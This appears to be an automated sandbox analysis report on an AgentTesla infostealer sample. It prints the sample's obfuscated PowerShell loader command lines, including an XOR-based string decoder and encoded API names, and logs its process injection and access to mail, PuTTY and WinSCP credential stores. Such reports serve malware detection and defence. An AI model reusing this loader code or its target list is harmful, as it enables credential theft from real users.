Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$orthopedists = """unfdyusensucintloisyonunst joathuindpriplobrlkeofogbaidisenktieansle0li fo{mu un mi bi papslahorflafamsk(fl[disretprrsaiconalgna]st`$mafmalunlprespssuusudregdeiudfretopeggnil)no;cu as le ba sp`$daoaftreocicmuodanegisatbletu en=be exnsnepawin-adoamblajteeracrutin fobniytytdeeke[in]st id(ti`$rafanlovlapeblsinufidungoriapftrtakehunim.rhlinerenflguntlihko re/ln pe2op)ar;ho gl fu ti scflooarrud(un`$befanacrmfaitrlgriaueskytidsqetylilsilesertfncyeun=me0fa;ry ko`$prfaraspmanihrlanispekrybidoveprlkosseeanrgunseemo mo-exltatst pe`$cofbelstldiehesreumadcegfeifyfbitbreranss.rilpaeginsmgfotouhoy;ha cr`$foflaalimeciafltribaeinykodbleafllascoeynrhonbresh+se=ra2an)fo{un vi be ly tr in fo un so`$ciohatgroidcguotrnfoinetskeol[fi`$kofchademsnidalbaifoesmycodsaesklrasinecarhnnuredo/ji2ve]fo hj=ro mi[skcstoufnrevsuererwhttw]ra:ri:exttaolsbkaytitdeese(pr`$unfnelkelhuedesbaufodplgdaiabfopthaesknch.bushouulbmascotrirgeikonungej(sl`$nafprakomvoishlanitoesnyendcyehaldysjueevrstnfoekr,cu fl2tj)in,ex as1dr6fo)ar;sy ja mu`$bjocatudodicbeomonroiretglebe[tr`$gefekadamtiiudlinimiecayotdvaepolmascoecerspnuneca/ko2la]sm lu=ev bu(mi`$trodutplocacnaosansaisutpaeal[ly`$brfleamimfoidrlcairaeseytoddreobltiscaekyrrenkaest/ge2ko]un cr-bibnexliomirte me1fl4re0sc)me;yu sg de ca ko}ko st[moslutedrtaitinsigmi]ta[resheyrestitkoeidmun.vatgrekaxchtbr.uneeunefchjomadelitanbsgtu]di:ly:poabissacetidriaf.stgnoeamtansnetanrsciskntegme(ki`$meometgrounccroudnraitatsaesu)ne;ch}ln`$munaeoshntnnstenegluatetskilivmeiinshotariincpr0bo=flageustdsaifroovlcooskgsuifrslukgreamsfl0pr au'fodsuflifty5gsfpifdifpa8miehe9sueic1imaca2lieov8faepr0baefr0wh'at;dd`$senbooannfrnunemegnaatctspianvmoiorsuntbaivvctr1mo=aaabiutidlaidiodiljuoekgreiansnekmaebosbo0tr ri'ancfi1teeoc5ufeskfugfbleacehj3rofvufbaeta3miecoaepfpl8fratr2fidunbudeba5loegu2vebuhfsmbplebaaaf2sodlu9uneek2cafstfstesudunefiabaede9hycgo2sieredadfgl8skeda5refglagaein9qucki1naepi9unfsk8peeli4foecm3uneuk8oxfdifko'pr;he`$vinmoobunprnmaecigprahithyisevprisdspotstikncmo2un=klamiuphdcaimaomalskoungriimnscoksteplspr0ta fr'focflbunera9brfst8grdcacbeffuekleud3biehaffrcredfieme8zyeid8sofpaesheco9jgfdifaxffofaa'un;ur`$ponspohensencoespgdiaretsuisovpoisksfatlaiovcin3tr=gaavaukrderipuocolphodegstibosprkpoeabsun0fo sp'fldfoffoffl5drfaafovfso8feedi9miese1riaaf2codcoesefte9vaesi2cafco8boesh5foebe1enetz9goabl2ancca5woeko2kofsy8liele9fifinesiema3ovftecisdimfspero9mufpretafefamaedu5deemifreesj9wefabfmaako2macfo4mieisdpaeka2asepr8tiemo0steov9bidcrecaegi9hiedoaca'yd;so`$benbaorenmonafebigkhatytpaiinvdritesistspiancka4pn=liathupsdpiiprofelunosegtrihosinkneeraspi0le sf'tefbefskfgr8mefreereech5cleho2krefobri'ma;fo`$sknunoetnconruegrgmiaxytreihavtoistscatfoimocsk5ga=srafuumidgriskoreldeoswgtuialstokpreklssy0ar to'focmibfoesc9mafet8kvcme1taeje3bresa8cafjo9cheta0byesa9recsi4emeapdfeera2coeph8abedi0frequ9en'au;to`$synomopengenenesagloanotunimevnoihese
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function audiologiskes0 { param([string]$fllesudgiften); $otoconite = new-object byte[] ($fllesudgiften.length / 2); for($familieydelserne=0; $familieydelserne -lt $fllesudgiften.length; $familieydelserne+=2){ $otoconite[$familieydelserne/2] = [convert]::tobyte($fllesudgiften.substring($familieydelserne, 2), 16); $otoconite[$familieydelserne/2] = ($otoconite[$familieydelserne/2] -bxor 140); } [string][system.text.encoding]::ascii.getstring($otoconite);}$nonnegativistic0=audiologiskes0 'dff5fff8e9e1a2e8e0e0';$nonnegativistic1=audiologiskes0 'c1e5effee3ffe3eaf8a2dbe5e2bfbea2d9e2ffedeae9c2edf8e5fae9c1e9f8e4e3e8ff';$nonnegativistic2=audiologiskes0 'cbe9f8dcfee3efcde8e8fee9ffff';$nonnegativistic3=audiologiskes0 'dff5fff8e9e1a2def9e2f8e5e1e9a2c5e2f8e9fee3fcdfe9fefae5efe9ffa2c4ede2e8e0e9dee9ea';$nonnegativistic4=audiologiskes0 'fff8fee5e2eb';$nonnegativistic5=audiologiskes0 'cbe9f8c1e3e8f9e0e9c4ede2e8e0e9';$nonnegativistic6=audiologiskes0 'ded8dffce9efe5ede0c2ede1e9a0acc4e5e8e9cef5dfe5eba0acdcf9eee0e5ef';$nonnegativistic7=audiologiskes0 'def9e2f8e5e1e9a0acc1ede2edebe9e8';$nonnegativistic8=audiologiskes0 'dee9eae0e9eff8e9e8c8e9e0e9ebedf8e9';$nonnegativistic9=audiologiskes0 'c5e2c1e9e1e3fef5c1e3e8f9e0e9';$unshadow0=audiologiskes0 'c1f5c8e9e0e9ebedf8e9d8f5fce9';$unshadow1=audiologiskes0 'cfe0edffffa0acdcf9eee0e5efa0acdfe9ede0e9e8a0accde2ffe5cfe0edffffa0accdf9f8e3cfe0edffff';$unshadow2=audiologiskes0 'c5e2fae3e7e9';$unshadow3=audiologiskes0 'dcf9eee0e5efa0acc4e5e8e9cef5dfe5eba0acc2e9fbdfe0e3f8a0acdae5fef8f9ede0';$unshadow4=audiologiskes0 'dae5fef8f9ede0cde0e0e3ef';$unshadow5=audiologiskes0 'e2f8e8e0e0';$unshadow6=audiologiskes0 'c2f8dcfee3f8e9eff8dae5fef8f9ede0c1e9e1e3fef5';$unshadow7=audiologiskes0 'c5c9d4';$unshadow8=audiologiskes0 'd0';function fkp {param ($transverses, $fosslify) ;$kabelforbindelserne0 =audiologiskes0 'a8c4ede2e8ffe3e1e9fff8acb1aca4d7cdfcfcc8e3e1ede5e2d1b6b6cff9fefee9e2f8c8e3e1ede5e2a2cbe9f8cdffffe9e1eee0e5e9ffa4a5acf0acdbe4e9fee9a1c3eee6e9eff8acf7aca8d3a2cbe0e3eeede0cdffffe9e1eee0f5cfedefe4e9aca1cde2e8aca8d3a2c0e3efedf8e5e3e2a2dffce0e5f8a4a8d9e2ffe4ede8e3fbb4a5d7a1bdd1a2c9fdf9ede0ffa4a8c2e3e2e2e9ebedf8e5fae5fff8e5efbca5acf1a5a2cbe9f8d8f5fce9a4a8c2e3e2e2e9ebedf8e5fae5fff8e5efbda5';&($unshadow7) $kabelforbindelserne0;$kabelforbindelserne5 = audiologiskes0 'a8c4e9e5e8e9e1edede2ffacb1aca8c4ede2e8ffe3e1e9fff8a2cbe9f8c1e9f8e4e3e8a4a8c2e3e2e2e9ebedf8e5fae5fff8e5efbea0acd7d8f5fce9d7d1d1accca4a8c2e3e2e2e9ebedf8e5fae5fff8e5efbfa0aca8c2e3e2e2e9ebedf8e5fae5fff8e5efb8a5a5';&($unshadow7) $kabelforbindelserne5;$kabelforbindelserne1 = audiologiskes0 'fee9f8f9fee2aca8c4e9e5e8e9e1edede2ffa2c5e2fae3e7e9a4a8e2f9e0e0a0accca4d7dff5fff8e9e1a2def9e2f8e5e1e9a2c5e2f8e9fee3fcdfe9fefae5efe9ffa2c4ede2e8e0e9dee9ead1a4c2e9fba1c3eee6e9eff8acdff5fff8e9e1a2def9e2f8e5e1e9a2c5e2f8e9fee3fcdfe9fefae5efe9ffa2c4ede2e8e0e9dee9eaa4a4c2e9
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$orthopedists = """unfdyusensucintloisyonunst joathuindpriplobrlkeofogbaidisenktieansle0li fo{mu un mi bi papslahorflafamsk(fl[disretprrsaiconalgna]st`$mafmalunlprespssuusudregdeiudfretopeggnil)no;cu as le ba sp`$daoaftreocicmuodanegisatbletu en=be exnsnepawin-adoamblajteeracrutin fobniytytdeeke[in]st id(ti`$rafanlovlapeblsinufidungoriapftrtakehunim.rhlinerenflguntlihko re/ln pe2op)ar;ho gl fu ti scflooarrud(un`$befanacrmfaitrlgriaueskytidsqetylilsilesertfncyeun=me0fa;ry ko`$prfaraspmanihrlanispekrybidoveprlkosseeanrgunseemo mo-exltatst pe`$cofbelstldiehesreumadcegfeifyfbitbreranss.rilpaeginsmgfotouhoy;ha cr`$foflaalimeciafltribaeinykodbleafllascoeynrhonbresh+se=ra2an)fo{un vi be ly tr in fo un so`$ciohatgroidcguotrnfoinetskeol[fi`$kofchademsnidalbaifoesmycodsaesklrasinecarhnnuredo/ji2ve]fo hj=ro mi[skcstoufnrevsuererwhttw]ra:ri:exttaolsbkaytitdeese(pr`$unfnelkelhuedesbaufodplgdaiabfopthaesknch.bushouulbmascotrirgeikonungej(sl`$nafprakomvoishlanitoesnyendcyehaldysjueevrstnfoekr,cu fl2tj)in,ex as1dr6fo)ar;sy ja mu`$bjocatudodicbeomonroiretglebe[tr`$gefekadamtiiudlinimiecayotdvaepolmascoecerspnuneca/ko2la]sm lu=ev bu(mi`$trodutplocacnaosansaisutpaeal[ly`$brfleamimfoidrlcairaeseytoddreobltiscaekyrrenkaest/ge2ko]un cr-bibnexliomirte me1fl4re0sc)me;yu sg de ca ko}ko st[moslutedrtaitinsigmi]ta[resheyrestitkoeidmun.vatgrekaxchtbr.uneeunefchjomadelitanbsgtu]di:ly:poabissacetidriaf.stgnoeamtansnetanrsciskntegme(ki`$meometgrounccroudnraitatsaesu)ne;ch}ln`$munaeoshntnnstenegluatetskilivmeiinshotariincpr0bo=flageustdsaifroovlcooskgsuifrslukgreamsfl0pr au'fodsuflifty5gsfpifdifpa8miehe9sueic1imaca2lieov8faepr0baefr0wh'at;dd`$senbooannfrnunemegnaatctspianvmoiorsuntbaivvctr1mo=aaabiutidlaidiodiljuoekgreiansnekmaebosbo0tr ri'ancfi1teeoc5ufeskfugfbleacehj3rofvufbaeta3miecoaepfpl8fratr2fidunbudeba5loegu2vebuhfsmbplebaaaf2sodlu9uneek2cafstfstesudunefiabaede9hycgo2sieredadfgl8skeda5refglagaein9qucki1naepi9unfsk8peeli4foecm3uneuk8oxfdifko'pr;he`$vinmoobunprnmaecigprahithyisevprisdspotstikncmo2un=klamiuphdcaimaomalskoungriimnscoksteplspr0ta fr'focflbunera9brfst8grdcacbeffuekleud3biehaffrcredfieme8zyeid8sofpaesheco9jgfdifaxffofaa'un;ur`$ponspohensencoespgdiaretsuisovpoisksfatlaiovcin3tr=gaavaukrderipuocolphodegstibosprkpoeabsun0fo sp'fldfoffoffl5drfaafovfso8feedi9miese1riaaf2codcoesefte9vaesi2cafco8boesh5foebe1enetz9goabl2ancca5woeko2kofsy8liele9fifinesiema3ovftecisdimfspero9mufpretafefamaedu5deemifreesj9wefabfmaako2macfo4mieisdpaeka2asepr8tiemo0steov9bidcrecaegi9hiedoaca'yd;so`$benbaorenmonafebigkhatytpaiinvdritesistspiancka4pn=liathupsdpiiprofelunosegtrihosinkneeraspi0le sf'tefbefskfgr8mefreereech5cleho2krefobri'ma;fo`$sknunoetnconruegrgmiaxytreihavtoistscatfoimocsk5ga=srafuumidgriskoreldeoswgtuialstokpreklssy0ar to'focmibfoesc9mafet8kvcme1taeje3bresa8cafjo9cheta0byesa9recsi4emeapdfeera2coeph8abedi0frequ9en'au;to`$synomopengenenesagloanotunimevnoihese Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function audiologiskes0 { param([string]$fllesudgiften); $otoconite = new-object byte[] ($fllesudgiften.length / 2); for($familieydelserne=0; $familieydelserne -lt $fllesudgiften.length; $familieydelserne+=2){ $otoconite[$familieydelserne/2] = [convert]::tobyte($fllesudgiften.substring($familieydelserne, 2), 16); $otoconite[$familieydelserne/2] = ($otoconite[$familieydelserne/2] -bxor 140); } [string][system.text.encoding]::ascii.getstring($otoconite);}$nonnegativistic0=audiologiskes0 'dff5fff8e9e1a2e8e0e0';$nonnegativistic1=audiologiskes0 'c1e5effee3ffe3eaf8a2dbe5e2bfbea2d9e2ffedeae9c2edf8e5fae9c1e9f8e4e3e8ff';$nonnegativistic2=audiologiskes0 'cbe9f8dcfee3efcde8e8fee9ffff';$nonnegativistic3=audiologiskes0 'dff5fff8e9e1a2def9e2f8e5e1e9a2c5e2f8e9fee3fcdfe9fefae5efe9ffa2c4ede2e8e0e9dee9ea';$nonnegativistic4=audiologiskes0 'fff8fee5e2eb';$nonnegativistic5=audiologiskes0 'cbe9f8c1e3e8f9e0e9c4ede2e8e0e9';$nonnegativistic6=audiologiskes0 'ded8dffce9efe5ede0c2ede1e9a0acc4e5e8e9cef5dfe5eba0acdcf9eee0e5ef';$nonnegativistic7=audiologiskes0 'def9e2f8e5e1e9a0acc1ede2edebe9e8';$nonnegativistic8=audiologiskes0 'dee9eae0e9eff8e9e8c8e9e0e9ebedf8e9';$nonnegativistic9=audiologiskes0 'c5e2c1e9e1e3fef5c1e3e8f9e0e9';$unshadow0=audiologiskes0 'c1f5c8e9e0e9ebedf8e9d8f5fce9';$unshadow1=audiologiskes0 'cfe0edffffa0acdcf9eee0e5efa0acdfe9ede0e9e8a0accde2ffe5cfe0edffffa0accdf9f8e3cfe0edffff';$unshadow2=audiologiskes0 'c5e2fae3e7e9';$unshadow3=audiologiskes0 'dcf9eee0e5efa0acc4e5e8e9cef5dfe5eba0acc2e9fbdfe0e3f8a0acdae5fef8f9ede0';$unshadow4=audiologiskes0 'dae5fef8f9ede0cde0e0e3ef';$unshadow5=audiologiskes0 'e2f8e8e0e0';$unshadow6=audiologiskes0 'c2f8dcfee3f8e9eff8dae5fef8f9ede0c1e9e1e3fef5';$unshadow7=audiologiskes0 'c5c9d4';$unshadow8=audiologiskes0 'd0';function fkp {param ($transverses, $fosslify) ;$kabelforbindelserne0 =audiologiskes0 'a8c4ede2e8ffe3e1e9fff8acb1aca4d7cdfcfcc8e3e1ede5e2d1b6b6cff9fefee9e2f8c8e3e1ede5e2a2cbe9f8cdffffe9e1eee0e5e9ffa4a5acf0acdbe4e9fee9a1c3eee6e9eff8acf7aca8d3a2cbe0e3eeede0cdffffe9e1eee0f5cfedefe4e9aca1cde2e8aca8d3a2c0e3efedf8e5e3e2a2dffce0e5f8a4a8d9e2ffe4ede8e3fbb4a5d7a1bdd1a2c9fdf9ede0ffa4a8c2e3e2e2e9ebedf8e5fae5fff8e5efbca5acf1a5a2cbe9f8d8f5fce9a4a8c2e3e2e2e9ebedf8e5fae5fff8e5efbda5';&($unshadow7) $kabelforbindelserne0;$kabelforbindelserne5 = audiologiskes0 'a8c4e9e5e8e9e1edede2ffacb1aca8c4ede2e8ffe3e1e9fff8a2cbe9f8c1e9f8e4e3e8a4a8c2e3e2e2e9ebedf8e5fae5fff8e5efbea0acd7d8f5fce9d7d1d1accca4a8c2e3e2e2e9ebedf8e5fae5fff8e5efbfa0aca8c2e3e2e2e9ebedf8e5fae5fff8e5efb8a5a5';&($unshadow7) $kabelforbindelserne5;$kabelforbindelserne1 = audiologiskes0 'fee9f8f9fee2aca8c4e9e5e8e9e1edede2ffa2c5e2fae3e7e9a4a8e2f9e0e0a0accca4d7dff5fff8e9e1a2def9e2f8e5e1e9a2c5e2f8e9fee3fcdfe9fefae5efe9ffa2c4ede2e8e0e9dee9ead1a4c2e9fba1c3eee6e9eff8acdff5fff8e9e1a2def9e2f8e5e1e9a2c5e2f8e9fee3fcdfe9fefae5efe9ffa2c4ede2e8e0e9dee9eaa4a4c2e9 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Orthopedists = """UnFDyuSensucIntLoiSyoNunSt JoAThuIndPriploBrlKeoFogBaiDisenkTieAnsle0li Fo{Mu Un Mi Bi PapSlaHorFlaFamSk(fl[DiSRetPrrSaiConalgNa]st`$MaFMalUnlPreSpsSuuSudRegDeiudfRetOpeGgnIl)No;Cu As le Ba Sp`$daOAftReoCicMuoDanEgiSatBleTu En=Be ExNSnePawIn-AdOAmbLajTeeRacRutIn FobNiyTytDeeKe[In]St Id(Ti`$RaFAnlovlApeBlsInuFidUngOriApfTrtAkehunIm.RhLIneRenFlgUntLihko Re/Ln Pe2Op)Ar;Ho Gl Fu Ti ScFLooArrUd(Un`$BeFAnaCrmFaiTrlGriAueSkyTidsqetylIlsileSerTfncyeUn=Me0Fa;Ry Ko`$PrFAraSpmAniHrlAniSpeKryBidOvePrlKosSeeAnrGunSeeMo Mo-ExlTatSt Pe`$CoFBelStlDieHesReuMadcegFeiFyfBitBreRanSs.RiLpaeGinSmgFotOuhOy;Ha Cr`$foFLaaLimEciAflTriBaeInyKodBleAflLascoeYnrHonBreSh+Se=Ra2An)Fo{Un Vi Be ly Tr in Fo Un So`$CiOHatGroIdcGuoTrnFoiNetskeOl[Fi`$KoFChaDemSniDalBaiFoeSmycodSaesklRasIneCarHnnUreDo/Ji2Ve]Fo Hj=Ro Mi[SkcStoUfnRevSueRerwhtTw]Ra:Ri:ExTTaoLsBKaytitDeeSe(Pr`$UnFNelKelHueDesbauFodPlgDaiAbfOptHaeSknch.buShouUlbmasCotRirgeiKonUngEj(Sl`$NaFPraKomVoiShlaniToeSnyEndcyeHalDysJueEvrstnFoekr,Cu fl2Tj)In,ex As1Dr6Fo)Ar;Sy Ja Mu`$BjOCatUdoDicBeoMonRoiRetgleBe[Tr`$GeFekaDamTiiUdlInimieCayOtdVaePolmasCoeCerSpnUneCa/Ko2la]Sm Lu=ev Bu(Mi`$TrOdutploCacNaoSanSaiSutPaeAl[Ly`$BrFleaMimFoiDrlCaiRaeSeyTodDreOblTisCaeKyrRenKaeSt/Ge2Ko]un Cr-BibnexLioMirTe Me1Fl4Re0Sc)Me;Yu Sg De Ca Ko}Ko St[MoSLutEdrTaiTinSigMi]Ta[ReSHeyResTitKoeIdmUn.VaTGreKaxChtbr.UnEeunefcHjoMadEliTanBsgTu]Di:Ly:PoAbiSSaCEtIDrIAf.StGNoeAmtAnSNetAnrSciSknTegMe(Ki`$MeOmetgroUncCroUdnRaiTatSaeSu)Ne;Ch}ln`$MuNAeoShntnnSteNegLuaTetSkiLivMeiInsHotAriIncPr0Bo=FlAGeuStdSaiFroOvlCooSkgsuiFrsLukgreAmsFl0Pr Au'foDSuFLiFTy5GsFPiFDiFPa8MiEHe9SuEIc1ImACa2LiEOv8FaEPr0BaEFr0Wh'At;Dd`$SeNBooAnnfrnUneMegNaaTctSpiAnvMoiOrsUntBaiVvcTr1Mo=AaABiuTidLaiDioDilJuoekgReiAnsNekMaeBosBo0Tr Ri'AnCFi1TeEOc5UfESkFUgFblEAcEHj3RoFVuFBaEta3MiECoAEpFPl8FrATr2FiDUnBUdEBa5LoEGu2VeBUhFSmBPlEbaAAf2SoDLu9UnEEk2CaFStFStESuDUnEFiABaEDe9HyCgo2SiEReDAdFgl8SkEDa5ReFGlAGaEIn9QuCKi1naEPi9UnFSk8PeELi4FoEcm3UnEUk8OxFDiFKo'Pr;He`$ViNMooBunPrnMaeCigPraHitHyiSevPriSdsPotStiKncMo2Un=KlAMiuphdCaiMaoMalSkoUngRiiMnscokStePlsPr0ta Fr'FoCflBUnERa9BrFSt8GrDcaCBeFFuEKlEUd3BiEHaFFrCReDFiEMe8ZyEId8SoFPaEShECo9JgFDiFAxFfoFAa'Un;ur`$PoNSpoHenSenCoeSpgDiaRetSuisovPoiSksFatLaiovcIn3Tr=GaAVauKrdEriPuoColPhoDegStibosPrkPoeAbsUn0Fo sp'FlDFoFFoFFl5DrFAaFOvFSo8FeEDi9MiESe1RiAAf2coDCoESeFTe9VaESi2CaFCo8BoESh5FoEBe1EnETz9GoABl2AnCCa5WoEKo2KoFSy8LiELe9FiFInESiEMa3OvFTeCIsDImFSpERo9MuFPrETaFEfAMaEDu5DeEMiFreEsj9WeFAbFMaAKo2MaCFo4MiEIsDPaEKa2AsEPr8TiEMo0StEOv9biDcrECaEGi9HiEDoACa'Yd;So`$BeNbaoRenMonAfeBigkhaTytPaiInvDriTesistSpiAncKa4Pn=liAThuPsdPiiProFelUnoSegTriHosInkNeeRasPi0Le Sf'TeFbeFSkFGr8MeFReEReECh5ClEHo2KrEFoBRi'Ma;Fo`$SkNUnoEtnconRuegrgMiaXytReihavToiStsCatFoiMocSk5Ga=SrAFuumidGriskoRelDeoSwgTuiAlsTokpreKlsSy0Ar To'FoCmiBFoESc9MaFEt8KvCMe1TaEje3BrESa8CaFJo9ChETa0ByESa9ReCSi4EmEApDFeERa2CoEPh8abEDi0FrEQu9En'Au;To`$SyNOmopenGenEneSagLoaNotUniMevNoiHesE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Audiologiskes0 { param([String]$Fllesudgiften); $Otoconite = New-Object byte[] ($Fllesudgiften.Length / 2); For($Familieydelserne=0; $Familieydelserne -lt $Fllesudgiften.Length; $Familieydelserne+=2){ $Otoconite[$Familieydelserne/2] = [convert]::ToByte($Fllesudgiften.Substring($Familieydelserne, 2), 16); $Otoconite[$Familieydelserne/2] = ($Otoconite[$Familieydelserne/2] -bxor 140); } [String][System.Text.Encoding]::ASCII.GetString($Otoconite);}$Nonnegativistic0=Audiologiskes0 'DFF5FFF8E9E1A2E8E0E0';$Nonnegativistic1=Audiologiskes0 'C1E5EFFEE3FFE3EAF8A2DBE5E2BFBEA2D9E2FFEDEAE9C2EDF8E5FAE9C1E9F8E4E3E8FF';$Nonnegativistic2=Audiologiskes0 'CBE9F8DCFEE3EFCDE8E8FEE9FFFF';$Nonnegativistic3=Audiologiskes0 'DFF5FFF8E9E1A2DEF9E2F8E5E1E9A2C5E2F8E9FEE3FCDFE9FEFAE5EFE9FFA2C4EDE2E8E0E9DEE9EA';$Nonnegativistic4=Audiologiskes0 'FFF8FEE5E2EB';$Nonnegativistic5=Audiologiskes0 'CBE9F8C1E3E8F9E0E9C4EDE2E8E0E9';$Nonnegativistic6=Audiologiskes0 'DED8DFFCE9EFE5EDE0C2EDE1E9A0ACC4E5E8E9CEF5DFE5EBA0ACDCF9EEE0E5EF';$Nonnegativistic7=Audiologiskes0 'DEF9E2F8E5E1E9A0ACC1EDE2EDEBE9E8';$Nonnegativistic8=Audiologiskes0 'DEE9EAE0E9EFF8E9E8C8E9E0E9EBEDF8E9';$Nonnegativistic9=Audiologiskes0 'C5E2C1E9E1E3FEF5C1E3E8F9E0E9';$Unshadow0=Audiologiskes0 'C1F5C8E9E0E9EBEDF8E9D8F5FCE9';$Unshadow1=Audiologiskes0 'CFE0EDFFFFA0ACDCF9EEE0E5EFA0ACDFE9EDE0E9E8A0ACCDE2FFE5CFE0EDFFFFA0ACCDF9F8E3CFE0EDFFFF';$Unshadow2=Audiologiskes0 'C5E2FAE3E7E9';$Unshadow3=Audiologiskes0 'DCF9EEE0E5EFA0ACC4E5E8E9CEF5DFE5EBA0ACC2E9FBDFE0E3F8A0ACDAE5FEF8F9EDE0';$Unshadow4=Audiologiskes0 'DAE5FEF8F9EDE0CDE0E0E3EF';$Unshadow5=Audiologiskes0 'E2F8E8E0E0';$Unshadow6=Audiologiskes0 'C2F8DCFEE3F8E9EFF8DAE5FEF8F9EDE0C1E9E1E3FEF5';$Unshadow7=Audiologiskes0 'C5C9D4';$Unshadow8=Audiologiskes0 'D0';function fkp {Param ($Transverses, $Fosslify) ;$Kabelforbindelserne0 =Audiologiskes0 'A8C4EDE2E8FFE3E1E9FFF8ACB1ACA4D7CDFCFCC8E3E1EDE5E2D1B6B6CFF9FEFEE9E2F8C8E3E1EDE5E2A2CBE9F8CDFFFFE9E1EEE0E5E9FFA4A5ACF0ACDBE4E9FEE9A1C3EEE6E9EFF8ACF7ACA8D3A2CBE0E3EEEDE0CDFFFFE9E1EEE0F5CFEDEFE4E9ACA1CDE2E8ACA8D3A2C0E3EFEDF8E5E3E2A2DFFCE0E5F8A4A8D9E2FFE4EDE8E3FBB4A5D7A1BDD1A2C9FDF9EDE0FFA4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBCA5ACF1A5A2CBE9F8D8F5FCE9A4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBDA5';&($Unshadow7) $Kabelforbindelserne0;$Kabelforbindelserne5 = Audiologiskes0 'A8C4E9E5E8E9E1EDEDE2FFACB1ACA8C4EDE2E8FFE3E1E9FFF8A2CBE9F8C1E9F8E4E3E8A4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBEA0ACD7D8F5FCE9D7D1D1ACCCA4A8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFBFA0ACA8C2E3E2E2E9EBEDF8E5FAE5FFF8E5EFB8A5A5';&($Unshadow7) $Kabelforbindelserne5;$Kabelforbindelserne1 = Audiologiskes0 'FEE9F8F9FEE2ACA8C4E9E5E8E9E1EDEDE2FFA2C5E2FAE3E7E9A4A8E2F9E0E0A0ACCCA4D7DFF5FFF8E9E1A2DEF9E2F8E5E1E9A2C5E2F8E9FEE3FCDFE9FEFAE5EFE9FFA2C4EDE2E8E0E9DEE9EAD1A4C2E9FBA1C3EEE6E9EFF8ACDFF5FFF8E9E1A2DEF9E2F8E5E1E9A2C5E2F8E9FEE3FCDFE9FEFAE5EFE9FFA2C4EDE2E8E0E9DEE9EAA4A4C2E9 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8124, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
